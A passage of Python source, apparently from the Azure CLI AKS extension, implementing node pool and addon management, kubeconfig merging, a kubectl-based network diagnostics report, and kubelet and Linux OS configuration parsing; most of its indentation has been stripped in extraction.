instance.power_state = power_state
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, cluster_name, nodepool_name)
def aks_addon_list_available():
available_addons = []
for k, v in ADDONS.items():
available_addons.append({
"name": k,
"description": ADDONS_DESCRIPTIONS[v]
})
return available_addons
def aks_addon_list(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
addon_profiles = client.get(resource_group_name, name).addon_profiles
current_addons = []
    for addon_name, addon_key in ADDONS.items():  # avoid shadowing the cluster `name` parameter
        if not addon_profiles or addon_key not in addon_profiles:
            current_addons.append({
                "name": addon_name,
                "api_key": addon_key,
                "enabled": False
            })
        else:
            current_addons.append({
                "name": addon_name,
                "api_key": addon_key,
                "enabled": addon_profiles[addon_key].enabled
            })
return current_addons
def aks_addon_show(cmd, client, resource_group_name, name, addon): # pylint: disable=unused-argument
addon_profiles = client.get(resource_group_name, name).addon_profiles
addon_key = ADDONS[addon]
if not addon_profiles or addon_key not in addon_profiles or not addon_profiles[addon_key].enabled:
raise CLIError(f'Addon "{addon}" is not enabled in this cluster.')
return {
"name": addon,
"api_key": addon_key,
"config": addon_profiles[addon_key].config,
"identity": addon_profiles[addon_key].identity
}
def aks_addon_enable(cmd, client, resource_group_name, name, addon, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None,
no_wait=False, enable_msi_auth_for_monitoring=False):
return enable_addons(cmd, client, resource_group_name, name, addon, workspace_resource_id=workspace_resource_id,
subnet_name=subnet_name, appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix,
appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace, enable_sgxquotehelper=enable_sgxquotehelper,
enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait,
enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring)
def aks_addon_disable(cmd, client, resource_group_name, name, addon, no_wait=False):
return aks_disable_addons(cmd, client, resource_group_name, name, addon, no_wait)
def aks_addon_update(cmd, client, resource_group_name, name, addon, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None,
no_wait=False, enable_msi_auth_for_monitoring=False):
addon_profiles = client.get(resource_group_name, name).addon_profiles
addon_key = ADDONS[addon]
if not addon_profiles or addon_key not in addon_profiles or not addon_profiles[addon_key].enabled:
raise CLIError(f'Addon "{addon}" is not enabled in this cluster.')
return enable_addons(cmd, client, resource_group_name, name, addon, check_enabled=False,
workspace_resource_id=workspace_resource_id,
subnet_name=subnet_name, appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix,
appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace, enable_sgxquotehelper=enable_sgxquotehelper,
enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait,
enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
try:
if addons == "monitoring" and CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled and \
CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
# remove the DCR association because otherwise the DCR can't be deleted
ensure_container_insights_for_monitoring(
cmd,
instance.addon_profiles[CONST_MONITORING_ADDON_NAME],
subscription_id,
resource_group_name,
name,
instance.location,
remove_monitoring=True,
aad_route=True,
create_dcr=False,
create_dcra=True
)
except TypeError:
pass
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None, appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None, no_wait=False, enable_msi_auth_for_monitoring=False):
instance = client.get(resource_group_name, name)
    # this is overwritten by _update_addons(), so the value needs to be recorded here
    msi_auth = instance.service_principal_profile.client_id == "msi"
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id, enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring, subnet_name=subnet_name,
appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper, enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait)
if CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled:
if CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
if not msi_auth:
                raise ArgumentUsageError("--enable-msi-auth-for-monitoring cannot be used on clusters with service principal auth.")
else:
# create a Data Collection Rule (DCR) and associate it with the cluster
ensure_container_insights_for_monitoring(cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=True, create_dcr=True, create_dcra=True)
else:
# monitoring addon will use legacy path
ensure_container_insights_for_monitoring(cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=False)
monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in instance.addon_profiles:
enable_virtual_node = True
need_post_creation_role_assignment = monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(
client.begin_create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if monitoring and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
            # All agent pools reside in the same vnet, and a vnet-level Contributor role
            # is granted in a later function, so using any one agent pool here is OK
random_agent_pool = result.agent_pool_profiles[0]
if random_agent_pool.vnet_subnet_id != "":
add_virtual_node_role_assignment(
cmd, result, random_agent_pool.vnet_subnet_id)
# Else, the cluster is not using custom VNet, the permission is already granted in AKS RP,
# we don't need to handle it in client side in this case.
else:
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, name, instance)
return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True): # pylint: disable=unused-argument
return sdk_no_wait(no_wait, client.begin_rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, # pylint: disable=too-many-branches,too-many-statements
instance,
subscription_id,
resource_group_name,
name,
addons,
enable,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
subnet_name=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
no_wait=False): # pylint: disable=unused-argument
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(
addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == CONST_MONITORING_ADDON_NAME:
logAnalyticsConstName = CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
if addon_profile.enabled:
                    raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
                                   'To change monitoring configuration, run "az aks disable-addons -a monitoring" '
                                   'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = sanitize_loganalytics_ws_resource_id(workspace_resource_id)
addon_profile.config = {logAnalyticsConstName: workspace_resource_id}
addon_profile.config[CONST_MONITORING_USING_AAD_MSI_AUTH] = enable_msi_auth_for_monitoring
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
                    raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
                                   'To change virtual-node configuration, run '
                                   f'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
                                   'before enabling it again.')
if not subnet_name:
                    raise CLIError(
                        'The virtual-node (aci-connector) addon requires setting a subnet name.')
addon_profile.config = {
CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The open-service-mesh addon is already enabled for this managed cluster.\n'
'To change open-service-mesh configuration, run '
f'"az aks disable-addons -a open-service-mesh -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The confcom addon is already enabled for this managed cluster.\n'
'To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
elif addon == CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The azure-keyvault-secrets-provider addon is already enabled for this managed cluster.\n'
'To change azure-keyvault-secrets-provider configuration, run '
f'"az aks disable-addons -a azure-keyvault-secrets-provider -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if disable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "false"
if rotation_poll_interval is not None:
addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(
enabled=False)
else:
raise CLIError(
"The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def aks_get_versions(cmd, client, location): # pylint: disable=unused-argument
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_os_options(cmd, client, location): # pylint: disable=unused-argument
return client.get_os_options(location, resource_type='managedClusters')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(
path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning(
'Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _handle_merge(existing, addition, key, replace):
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
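# A minimal sketch of _handle_merge semantics with hypothetical entries:
# merging addition = {'clusters': [{'name': 'aks1', 'cluster': NEW}]} into
# existing = {'clusters': [{'name': 'aks1', 'cluster': OLD}]} with replace=True
# (or identical entries) drops the old 'aks1' record and appends the new one;
# with replace=False and differing contents the user is prompted, and a
# CLIError is raised when no TTY is available to answer the prompt.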
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
    except (IOError, OSError) as ex:
        if getattr(ex, 'errno', 0) == errno.ENOENT:
            raise CLIError('{} does not exist'.format(filename))
        raise
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
    addition = load_kubernetes_configuration(addition_file)
    # validate the addition before it is indexed into below
    if addition is None:
        raise CLIError(
            'failed to load additional configuration from {}'.format(addition_file))
    if context_name is not None:
        addition['contexts'][0]['name'] = context_name
        addition['contexts'][0]['context']['cluster'] = context_name
        addition['clusters'][0]['name'] = context_name
        addition['current-context'] = context_name
    # rename the admin context so it doesn't overwrite the user context
    for ctx in addition.get('contexts', []):
        try:
            if ctx['context']['user'].startswith('clusterAdmin'):
                admin_name = ctx['name'] + '-admin'
                addition['current-context'] = ctx['name'] = admin_name
                break
        except (KeyError, TypeError):
            continue
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(
stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(
current_context, existing_file)
print(msg)
def cloud_storage_account_service_factory(cli_ctx, kwargs):
from azure.cli.core.profiles import ResourceType, get_sdk
t_cloud_storage_account = get_sdk(
cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
account_name = kwargs.pop('account_name', None)
account_key = kwargs.pop('account_key', None)
sas_token = kwargs.pop('sas_token', None)
kwargs.pop('connection_string', None)
return t_cloud_storage_account(account_name, account_key, sas_token)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
from azure.mgmt.monitor import MonitorManagementClient
diag_settings_client = get_mgmt_service_client(
cli_ctx, MonitorManagementClient).diagnostic_settings
subscription_id = get_subscription_id(cli_ctx)
aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
'/managedClusters/{2}'.format(subscription_id,
resource_group_name, name)
diag_settings = diag_settings_client.list(aks_resource_id)
if diag_settings.value:
return diag_settings.value[0].storage_account_id
print("No diag settings specified")
return None
def display_diagnostics_report(temp_kubeconfig_path): # pylint: disable=too-many-statements
if not which('kubectl'):
        raise CLIError('Cannot find kubectl executable in PATH')
nodes = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "node", "--no-headers"],
universal_newlines=True)
logger.debug(nodes)
node_lines = nodes.splitlines()
ready_nodes = {}
for node_line in node_lines:
columns = node_line.split()
logger.debug(node_line)
if columns[1] != "Ready":
logger.warning(
"Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
else:
ready_nodes[columns[0]] = False
logger.debug('There are %s ready nodes in the cluster',
str(len(ready_nodes)))
if not ready_nodes:
logger.warning(
'No nodes are ready in the current cluster. Diagnostics info might not be available.')
network_config_array = []
network_status_array = []
apds_created = False
max_retry = 10
for retry in range(0, max_retry):
if not apds_created:
apd = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get",
"apd", "-n", "aks-periscope", "--no-headers"],
universal_newlines=True
)
apd_lines = apd.splitlines()
if apd_lines and 'No resources found' in apd_lines[0]:
apd_lines.pop(0)
print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
len(ready_nodes),
'.' * retry), end='')
if len(apd_lines) < len(ready_nodes):
time.sleep(3)
else:
apds_created = True
print()
else:
for node_name in ready_nodes:
if ready_nodes[node_name]:
continue
apdName = "aks-periscope-diagnostic-" + node_name
try:
network_config = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
universal_newlines=True)
logger.debug('Dns status for node %s is %s',
node_name, network_config)
network_status = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
universal_newlines=True)
logger.debug('Network status for node %s is %s',
node_name, network_status)
if not network_config or not network_status:
print("The diagnostics information for node {} is not ready yet. "
"Will try again in 10 seconds.".format(node_name))
time.sleep(10)
break
network_config_array += json.loads(
'[' + network_config + ']')
network_status_object = json.loads(network_status)
network_status_array += format_diag_status(
network_status_object)
ready_nodes[node_name] = True
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
print()
if network_config_array:
print("Below are the network configuration for each node: ")
print()
print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
print()
else:
logger.warning("Could not get network config. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
if network_status_array:
print("Below are the network connectivity results for each node:")
print()
print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
else:
logger.warning("Could not get networking status. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
for diag in diag_status:
if diag["Status"]:
if "Error:" in diag["Status"]:
diag["Status"] = f'{colorama.Fore.RED}{diag["Status"]}{colorama.Style.RESET_ALL}'
else:
diag["Status"] = f'{colorama.Fore.GREEN}{diag["Status"]}{colorama.Style.RESET_ALL}'
return diag_status
def format_bright(msg):
return f'\033[1m{colorama.Style.BRIGHT}{msg}{colorama.Style.RESET_ALL}'
def format_hyperlink(the_link):
return f'\033[1m{colorama.Style.BRIGHT}{colorama.Fore.BLUE}{the_link}{colorama.Style.RESET_ALL}'
def get_aks_custom_headers(aks_custom_headers=None):
headers = {}
    if aks_custom_headers:
        for pair in aks_custom_headers.split(','):
            parts = pair.split('=')
            if len(parts) != 2:
                raise CLIError('custom headers format is incorrect; expected comma-separated key=value pairs')
            headers[parts[0]] = parts[1]
return headers
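# A minimal sketch of the --aks-custom-headers wire format with hypothetical
# values: "CustomHeader1=value1,CustomHeader2=value2" parses to
# {'CustomHeader1': 'value1', 'CustomHeader2': 'value2'}. Because each pair is
# split on '=', header values containing '=' or ',' are not supported here.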
def _put_managed_cluster_ensuring_permission(
cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
subscription_id,
resource_group_name,
name,
managed_cluster,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
need_grant_vnet_permission_to_cluster_identity,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait
):
    # some addons require post cluster creation role assignment
need_post_creation_role_assignment = (monitoring_addon_enabled or
ingress_appgw_addon_enabled or
(enable_managed_identity and attach_acr) or
virtual_node_addon_enabled or
need_grant_vnet_permission_to_cluster_identity)
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
cluster = LongRunningOperation(cmd.cli_ctx)(client.begin_create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(cluster, cmd)
if virtual_node_addon_enabled:
add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
if need_grant_vnet_permission_to_cluster_identity:
if not create_role_assignment(cmd.cli_ctx, 'Network Contributor',
cluster.identity.principal_id, scope=vnet_subnet_id,
resolve_assignee=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if cluster.identity_profile is None or \
cluster.identity_profile["kubeletidentity"] is None:
                logger.warning('Your cluster is successfully created, but we failed to attach '
                               'ACR to it. You can manually grant permission to the identity '
                               'named <CLUSTER_NAME>-agentpool in the MC_ resource group to give '
                               'it permission to pull from ACR.')
else:
kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
else:
cluster = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers)
return cluster
def _is_msi_cluster(managed_cluster):
    return (managed_cluster and managed_cluster.identity and
            managed_cluster.identity.type.casefold() in ("systemassigned", "userassigned"))
def _get_kubelet_config(file_path):
if not os.path.isfile(file_path):
raise CLIError("{} is not valid file, or not accessable.".format(file_path))
kubelet_config = get_file_json(file_path)
if not isinstance(kubelet_config, dict):
raise CLIError(
"Error reading kubelet configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = KubeletConfig()
config_object.cpu_manager_policy = kubelet_config.get(
"cpuManagerPolicy", None)
config_object.cpu_cfs_quota = kubelet_config.get("cpuCfsQuota", None)
config_object.cpu_cfs_quota_period = kubelet_config.get(
"cpuCfsQuotaPeriod", None)
config_object.image_gc_high_threshold = kubelet_config.get(
"imageGcHighThreshold", None)
config_object.image_gc_low_threshold = kubelet_config.get(
"imageGcLowThreshold", None)
config_object.topology_manager_policy = kubelet_config.get(
"topologyManagerPolicy", None)
config_object.allowed_unsafe_sysctls = kubelet_config.get(
"allowedUnsafeSysctls", None)
config_object.fail_swap_on = kubelet_config.get("failSwapOn", None)
config_object.container_log_max_files = kubelet_config.get(
"containerLogMaxFiles", None)
config_object.container_log_max_size_mb = kubelet_config.get(
"containerLogMaxSizeMB", None)
config_object.pod_max_pids = kubelet_config.get(
"podMaxPids", None)
return config_object
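# A minimal sketch of a kubelet configuration file accepted by
# _get_kubelet_config above (hypothetical values; see
# https://aka.ms/CustomNodeConfig for the full schema):
# {
#     "cpuManagerPolicy": "static",
#     "cpuCfsQuota": true,
#     "imageGcHighThreshold": 85,
#     "imageGcLowThreshold": 80,
#     "failSwapOn": false
# }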
def _get_linux_os_config(file_path):
if not os.path.isfile(file_path):
raise CLIError("{} is not valid file, or not accessable.".format(file_path))
os_config = get_file_json(file_path)
if not isinstance(os_config, dict):
raise CLIError(
"Error reading Linux OS configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = LinuxOSConfig()
config_object.transparent_huge_page_enabled = os_config.get(
"transparentHugePageEnabled", None)
config_object.transparent_huge_page_defrag = os_config.get(
"transparentHugePageDefrag", None)
config_object.swap_file_size_mb = os_config.get("swapFileSizeMB", None)
# sysctl settings
sysctls = os_config.get("sysctls", None)
if not isinstance(sysctls, dict):
raise CLIError(
"Error reading Sysctl settings at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object.sysctls = SysctlConfig()
config_object.sysctls.net_core_somaxconn = sysctls.get(
"netCoreSomaxconn", None)
config_object.sysctls.net_core_netdev_max_backlog = sysctls.get(
"netCoreNetdevMaxBacklog", None)
config_object.sysctls.net_core_rmem_max = sysctls.get(
"netCoreRmemMax", None)
config_object.sysctls.net_core_wmem_max = sysctls.get(
"netCoreWmemMax", None)
config_object.sysctls.net_core_optmem_max = sysctls.get(
"netCoreOptmemMax", None)
config_object.sysctls.net_ipv4_tcp_max_syn_backlog = sysctls.get(
"netIpv4TcpMaxSynBacklog", None)
config_object.sysctls.net_ipv4_tcp_max_tw_buckets = sysctls.get(
"netIpv4TcpMaxTwBuckets", None)
config_object.sysctls.net_ipv4_tcp_fin_timeout = sysctls.get(
"netIpv4TcpFinTimeout", None)
config_object.sysctls.net_ipv4_tcp_keepalive_time = sysctls.get(
"netIpv4TcpKeepaliveTime", None)
config_object.sysctls.net_ipv4_tcp_keepalive_probes = sysctls.get(
"netIpv4TcpKeepaliveProbes", None)
config_object.sysctls.net_ipv4_tcpkeepalive_intvl = sysctls.get(
"netIpv4TcpkeepaliveIntvl", None)
config_object.sysctls.net_ipv4_tcp_rmem = sysctls.get(
"netIpv4TcpRmem", None)
config_object.sysctls.net_ipv4_tcp_wmem = sysctls.get(
"netIpv4TcpWmem", None)
config_object.sysctls.net_ipv4_tcp_tw_reuse = sysctls.get(
"netIpv4TcpTwReuse", None)
config_object.sysctls.net_ipv4_ip_local_port_range = sysctls.get(
"netIpv4IpLocalPortRange", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh1 = sysctls.get(
"netIpv4NeighDefaultGcThresh1", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh2 = sysctls.get(
"netIpv4NeighDefaultGcThresh2", None)
